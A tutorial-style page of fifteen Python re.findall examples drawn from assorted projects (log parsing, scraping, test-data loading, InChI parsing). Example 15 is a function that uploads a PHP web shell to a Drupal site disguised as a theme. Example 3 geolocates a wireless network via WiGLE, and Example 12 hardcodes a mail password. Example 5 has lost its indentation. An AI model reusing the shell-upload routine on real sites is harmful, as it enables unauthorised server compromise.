This article collects typical usage examples of Python's re.findall function. If you are wondering what findall actually does, how to call it, or what it looks like in real code, the curated examples below should help.
15 code examples of the findall function are shown below, sorted by popularity by default.
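Before the project-specific examples, here is a minimal, self-contained sketch of re.findall's core behavior (standard-library semantics; the sample text and patterns are invented purely for illustration):

import re

text = "Iteration 100, loss = 0.25 | Iteration 200, loss = 0.18"

# No capture group: findall returns each full match.
print(re.findall(r"\d+\.\d+", text))                     # ['0.25', '0.18']

# Exactly one group: findall returns just that group.
print(re.findall(r"Iteration (\d+)", text))              # ['100', '200']

# Two or more groups: findall returns one tuple per match.
print(re.findall(r"Iteration (\d+), loss = (\d+\.\d+)", text))
# [('100', '0.25'), ('200', '0.18')]

# Flags (re.IGNORECASE, re.DOTALL, ...) are passed as the third argument.
print(re.findall(r"iteration", text, re.IGNORECASE))     # ['Iteration', 'Iteration']

Because findall returns an empty list (never None) when nothing matches, the examples below routinely test its result with a plain if, as in the if retFind: and if title_s: checks further down.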
Example 1: DownloadUpdate
def DownloadUpdate(self, file):
    self.log('Downloading: %s' % file)
    dirfile = os.path.join(self.UpdateTempDir, file)
    dirname, filename = os.path.split(dirfile)
    if not os.path.isdir(dirname):
        try:
            os.makedirs(dirname)
        except:
            self.log('Error creating directory: ' + dirname)
    url = self.SVNPathAddress + urllib.quote(file)
    try:
        # For .xbt texture files, read the total file size from the SVN log page first.
        if re.findall(".xbt", url):
            self.totalsize = int(re.findall("File length: ([0-9]*)",
                                            urllib2.urlopen(url + "?view=log").read())[0])
        urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
        self.DownloadedFiles.append(urllib.unquote(url))
        return 1
    except:
        # Retry once after a short pause before reporting a failure.
        try:
            time.sleep(2)
            if re.findall(".xbt", url):
                self.totalsize = int(re.findall("File length: ([0-9]*)",
                                                urllib2.urlopen(url + "?view=log").read())[0])
            urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
            self.DownloadedFiles.append(urllib.unquote(url))
            return 1
        except:
            self.log("Download failed: %s" % url)
            self.DownloadFailedFiles.append(urllib.unquote(url))
            return 0
Example 2: ident_author
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+', name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
        for b in j['results']['bindings']:
            author_orig = b['name']['value']
            uri = b['author']['value']
            author = b['name']['value'].upper()
            subnames = author_orig.split()
            author = ''.join(re.findall('[A-Z0-9]+', author))
            dist = jaccard_ngram_dist(name, author, 3)
            best_authors.append(((author_orig, uri), dist))
            if len(subnames) >= 2:
                for sname in [subnames[0], subnames[-1]]:
                    sname = ''.join(re.findall('[A-Z0-9]+', sname))
                    dist = jaccard_ngram_dist(name, sname, 3)
                    best_authors.append(((author_orig, uri), dist))
            if len(best_authors) > 20:
                best_authors.sort(key=lambda x: x[1])
                best_authors = best_authors[:5]
    best_authors.sort(key=lambda x: x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist - best_dist) * 2 / float(dist + best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles) > 1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
Example 3: wigle_print
def wigle_print(username, password, netid):
    browser = mechanize.Browser()
    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})
    browser.open('https://wigle.net//gps/gps/main/login', reqData)
    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()
    mapLat = 'N/A'
    mapLon = 'N/A'
    # Pull the value between '=' and '&' out of the maplat/maplon query parameters.
    rLat = re.findall(r'maplat=.*\&', resp)
    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]
    rLon = re.findall(r'maplon=.*\&', resp)
    if rLon:
        mapLon = rLon[0].split('&')[0].split('=')[1]
    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
Example 4: parse_log
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()
    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []
    fileName = os.path.basename(log_file)
    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))
    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)
    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []
    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100
        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))
        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)
    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)
    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
Example 5: getCategoryUrl
def getCategoryUrl(site="",url=""):
catDb = openTable(tableName=global_setting['catTable'])
r = session.get(url)
if not r.text:
return False
soup = BeautifulSoup(r.text)
for level1 in soup.select('.classify_books'):
curLevel1 = level1.select('.classify_title')[0].text
curLevel1 = re.sub('\s', '', curLevel1)
for level2 in level1.select('.classify_kind'):
curLevel2 = level2.select('.classify_kind_name')[0].text
curLevel2 = re.sub('\s', '', curLevel2)
for level3 in level2.select('ul li a'):
#curLevel3 = re.sub('\s', '', level3.text)
curLevel3 = level3.text.strip()
curlUrl = level3['href']
retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
if retFind:
curCatID = retFind[0]
catType = 'book'
else:
retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
if retFind:
curCatID = retFind[0]
catType = 'nonbook'
if retFind:
if catDb.find({'catId':curCatID}).count() >0:
logger.debug('catetogy %s exists,skip\n'%(curCatID))
else:
catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
return True
Example 6: __load_testdata
def __load_testdata(file):
    """
    Reads the testdata out of a file. Testdata consists of exactly three
    strings on each line, each one enclosed in quotation marks (" or ').
    The first is the filename to be parsed, the second is the series name
    that should be parsed out of it, and the third is the issue number string
    that should be parsed out of it.
    Blank lines and lines that begin with # are ignored.
    """
    retval = []
    if File.Exists(file):
        with StreamReader(file, Encoding.UTF8, False) as sr:
            line = sr.ReadLine()
            while line is not None:
                line = line.strip()
                if len(line) > 0 and not line.startswith("#"):
                    if line.startswith('"'):
                        data = re.findall(r'"(.*?)"', line)
                    else:
                        data = re.findall(r"'(.*?)'", line)
                    if len(data) == 3:
                        data.append("")
                    if len(data) != 4:
                        raise Exception("badly formatted test data")
                    retval.append(data)
                line = sr.ReadLine()
    return retval
Example 7: extractSrcFileData
def extractSrcFileData(self, path):
    fileinput.close()
    isLocListener = False
    # Note: '$' and '()' are escaped so they match the literal characters in the
    # smali bytecode; unescaped they are regex metacharacters and never match.
    wakeLockAcqRegex = r"invoke-virtual(.*?)Landroid/os/PowerManager\$WakeLock;->acquire\(\)"
    domRegex = r"invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder\(\)"
    saxRegex = r"invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser\(\)"
    xmlppRegex = r"invoke-static(.*?)Landroid/util/Xml;->newPullParser\(\)"
    for line in fileinput.input([path]):
        matches = re.findall(wakeLockAcqRegex, line)
        if len(matches) > 0:
            self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
        if line.startswith(".implements Landroid/location/LocationListener;"):
            self.numLocListeners = self.numLocListeners + 1
            isLocListener = True
        if isLocListener:
            if "\"gps\"" in line:
                self.numGpsUses = self.numGpsUses + 1
        matches = re.findall(domRegex, line)
        if len(matches) > 0:
            self.numDomParser = self.numDomParser + 1
        matches = re.findall(saxRegex, line)
        if len(matches) > 0:
            self.numSaxParser = self.numSaxParser + 1
        matches = re.findall(xmlppRegex, line)
        if len(matches) > 0:
            self.numXMLPullParser = self.numXMLPullParser + 1
Example 8: ReadProtonCounts
def ReadProtonCounts(inchi):
    import re
    # Get InChI layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]
    # Initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])
    # Find, save and remove tautomeric portions from the main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]
    # Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)
    return protons, formula, tautomerics, fprotons
Example 9: evalAtom
def evalAtom(self, atom, param_names):
    if atom in self.consts:
        return '(const _%s)' % atom
    elif atom in param_names:
        return '(param (paramref \"%s\"))' % atom
    elif re.match(r'^\d+$', atom):
        return '(const (intc %s))' % atom
    elif atom.lower() in ['true', 'false']:
        return '(const (boolc %s))' % atom.lower()
    elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
        if re.match(r'^forall.*end$', atom):
            params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
        else:
            params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
        param_name_dict, param_defs = analyzeParams(params)
        for p in param_names:
            if p not in param_name_dict:
                param_name_dict[p] = 0
        text = self.splitText(text)
        sub_form = self.evaluate(self.process(text), param_name_dict)
        if re.match(r'^forall.*?end$', atom):
            return '(forallFormula %s %s)' % (param_defs, sub_form)
        else:
            return '(existFormula %s %s)' % (param_defs, sub_form)
    else:
        return '(var %s)' % self.evalVar(atom)
Example 10: showCovers_adddetail_csfd
def showCovers_adddetail_csfd(self, data, title):
    title_s = re.findall('<title>(.*?)\|', data, re.S)
    if title_s:
        if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
            csfd_title = title_s[0]
        else:
            csfd_title = title
        print "EMC csfd: Movie name - %s" % csfd_title
    else:
        csfd_title = title
    bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
    if bild:
        print "EMC csfd: Cover Select - %s" % title
        self.cover_count = self.cover_count + 1
        csfd_url = "http:" + bild[0].replace('\\', '').strip()
        self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
        self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
        bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
        if bild:
            bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
            if bild1:
                for each in bild1:
                    print "EMC csfd: Cover Select - %s" % title
                    self.cover_count = self.cover_count + 1
                    csfd_url = "http:" + each.replace('\\', '').strip()
                    self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
                    self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
            else:
                print "EMC csfd 3 : no else covers - %s" % title
        else:
            print "EMC csfd 2 : no else covers - %s" % title
    else:
        print "EMC csfd 1 : keine infos gefunden - %s" % title
Example 11: __get_dom_elements
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re.S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    # Retry with an unquoted-attribute pattern when the quoted form found nothing.
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re.S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]
            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list
    return this_list
Example 12: weatherReport
def weatherReport():
    htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
    htmltext = htmlfile.read()
    rnTemp = '<span itemprop="temperature-fahrenheit">(.+?)</span>'
    conditions = '<div class="wx-phrase ">(.+?)</div>'
    tonightTemp = '<div class="wx-temperature">(.+?)</div>'
    rntPattern = re.compile(rnTemp)
    conditionsPattern = re.compile(conditions)
    tonightTempPattern = re.compile(tonightTemp)
    rntInstance = re.findall(rntPattern, htmltext)
    conditionsInstance = re.findall(conditionsPattern, htmltext)
    tonightTempInstance = re.findall(tonightTempPattern, htmltext)
    currentConditions = conditionsInstance[0]
    tonightConditions = conditionsInstance[2]
    currentTemp = rntInstance[0]
    tonightTemp = tonightTempInstance[2][:2]
    print currentTemp
    to = ['[email protected]', '[email protected]']
    sender = 'weather.bot1'
    subject = 'Your Daily Weather Forecast is Here'
    bodymsg = "Right now: " + currentTemp + ' degrees.' + ' ' + currentConditions + '.' + "\n" + "Tonight: " + \
              tonightTemp + ' degrees.' + ' ' + tonightConditions + '.\n\n' + "Read more about today's weather here: " \
              "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n" + "This message was made by request via WeatherBot.\nHave a great day."
    for address in to:
        createMessage(address, '[email protected]', 'skytower', subject, bodymsg)
    return
Example 13: get_episode
def get_episode(self, url):
    html = self.fetch_url(url)
    divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html)
    result = []
    if divs:
        for div in divs:
            # link / "第N集" (episode number) / subtitle
            r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])
            if r:  # TV series
                for ep_data in r:
                    result.append({"title": ep_data[1] + " " + ep_data[2],
                                   "img": "",
                                   "url": ep_data[0]})
            else:
                # link / title / subtitle / issue number (date)
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                if r:  # variety show
                    for ep_data in r:
                        dateA = ep_data[3].split("-")
                        date = ""
                        if len(dateA) == 3:  # e.g. 2012-08-12
                            date = "%s.%s.%s" % (dateA[2], dateA[1], dateA[0])
                        result.append({"title": ep_data[1] + " " + ep_data[2],
                                       "img": "",
                                       "url": ep_data[0],
                                       "date": date})
    return result
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
Example 14: parse_current_docket
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))
    docket = dict(docket_record)
    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'
    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]
    docket['comments'] = []
    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket
    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))
        link = pq(tds[-1]).find('a')
        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }
        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']
        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]
        docket['comments'].append(doc)
    assert len(docket['comments']) < 100000, "we probably exceeded one page"
    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]
    return docket
Example 15: drupal_upload
def drupal_upload(url, login, pwd):
    print '[*] Trying to install theme with shell.'
    dpl_sess = drupal_admin(url, login, pwd)
    info = ('name = ' + globals.SHELL_NAME + '\ndescription = ' + globals.SHELL_NAME +
            '\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = ' + globals.SHELL_EXT)
    page = dpl_sess.get(url + "?q=admin/appearance/install")
    token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />', page.text)
    token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />', page.text)
    if (token1 == []) or (token2 == []):
        print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
        sys.exit()
    post = {'form_build_id': str(token1[0]),
            'form_token': str(token2[0]),
            'form_id': 'update_manager_install_form',
            'op': 'Install'}
    print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
    arch = zipfile.ZipFile(globals.SHELL_NAME + ".zip", 'w')
    arch.writestr(globals.SHELL_NAME + "/" + globals.SHELL_EXT, globals.PHP_EXEC)
    arch.writestr(globals.SHELL_NAME + "/" + globals.SHELL_NAME + ".info", info)
    arch.close()
    file = {'files[project_upload]': (globals.SHELL_NAME + ".zip", open(globals.SHELL_NAME + ".zip", 'rb'), 'application/zip')}
    print '[*] Trying to upload zip file.'
    up = dpl_sess.post(url + "?q=admin/appearance/install", files=file, data=post, timeout=None)
    get_link = re.findall('URL=(.*?)" />', up.text)
    if not get_link:
        print '[-] Failed to upload zip file. Try one more time.'
        sys.exit()
    # The redirect URL is HTML-escaped in the page source, so unescape the ampersands.
    link = str(get_link[0]).replace('&amp;', '&')
    dpl_sess.get(link)
    shell = url + "sites/all/themes/" + globals.SHELL_NAME + "/" + globals.SHELL_EXT
    check = dpl_sess.get(shell)
    if check.status_code == 200:
        return shell
    else:
        print '[-] Themes or tmp directories is not writable.'
        sys.exit()